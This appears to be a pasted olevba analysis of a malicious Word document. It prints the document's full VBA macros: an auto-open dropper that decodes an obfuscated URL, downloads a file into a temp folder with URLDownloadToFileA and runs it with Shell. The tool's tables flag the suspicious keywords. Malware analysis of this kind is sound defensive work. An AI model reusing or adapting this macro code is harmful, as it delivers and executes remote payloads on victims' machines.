Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MAS---- document1.doc
- (Flags: OpX=OpenXML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: document1.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: document1.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub autoopen()
- yQtUv56E4r
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +----------+----------+---------------------------------------+
- | Type | Keyword | Description |
- +----------+----------+---------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- +----------+----------+---------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: document1.doc - OLE stream: u'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- #If VBA7 Then
- Private Declare PtrSafe Function sdfsdfsdfsdf Lib "urlmon" Alias _
- "URLDownloadToFileA" (ByVal fdgsdfFF As LongPtr, _
- ByVal gfhgfhF As String, _
- ByVal hjkhgFF As String, _
- ByVal gfhfghF As Long, _
- ByVal gfdgdf As LongPtr) As LongPtr
- #Else
- Private Declare Function sdfsdfsdfsdf Lib "urlmon" Alias _
- "URLDownloadToFileA" (ByVal fdgsdfFF As Long, _
- ByVal gfhgfhF As String, _
- ByVal hjkhgFF As String, _
- ByVal gfhfghF As Long, _
- ByVal gfdgdf As Long) As Long
- #End If
- Function ukQ2q73(o9Z_ As String, lb2tLi3yX9 As String) As Boolean
- vJHKBJdfkgfg = sdfsdfsdfsdf(0&, o9Z_, lb2tLi3yX9, 0&, 0&)
- Dim G32Q
- G32Q = Shell(lb2tLi3yX9, 1)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+--------------------+-----------------------------------------+
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Shell | May run an executable file or a system |
- | | | command |
- | Suspicious | URLDownloadToFileA | May download files from the Internet |
- +------------+--------------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Class1.cls
- in file: document1.doc - OLE stream: u'Macros/VBA/Class1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Module2.bas
- in file: document1.doc - OLE stream: u'Macros/VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function wNLiDcUQctHeQbyt(TRQIOVnNMdSVNmP As String) As String
- GoTo GiChFYjYUOh
- GiChFYjYUOh:
- GoTo lvBxJabwyHfMp
- lvBxJabwyHfMp:
- For saOjZPeoQQJJ = 1 To Len(TRQIOVnNMdSVNmP) Step 2
- GoTo LTIokkjoZR
- LTIokkjoZR:
- GoTo ePgjmeCgKuqfzq
- ePgjmeCgKuqfzq:
- wNLiDcUQctHeQbyt = wNLiDcUQctHeQbyt & Mid(TRQIOVnNMdSVNmP, saOjZPeoQQJJ, 1)
- GoTo nnaMoKQlSkVaAo
- nnaMoKQlSkVaAo:
- GoTo xuRnLR
- xuRnLR:
- GoTo drMOY
- drMOY:
- Next
- GoTo VoIcVLrAAzEpipT
- VoIcVLrAAzEpipT:
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO Module3.bas
- in file: document1.doc - OLE stream: u'Macros/VBA/Module3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub yQtUv56E4r()
- ukQ2q73 wNLiDcUQctHeQbyt("h„tTtep}:O/u/Mr{e:tkr:oP-DmgoGtsoS.hcsbla‚.?p[lj/mjsI/?bwi{nU.be†x2e‚"), Environ(wNLiDcUQctHeQbyt("T8M}P-")) & wNLiDcUQctHeQbyt("\9G1HHjhk…d/j2fDgrjhk=G@KJ'.Le\xGe„")
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+---------+---------------------------------------+
- | Type | Keyword | Description |
- +------------+---------+---------------------------------------+
- | Suspicious | Environ | May read system environment variables |
- +------------+---------+---------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement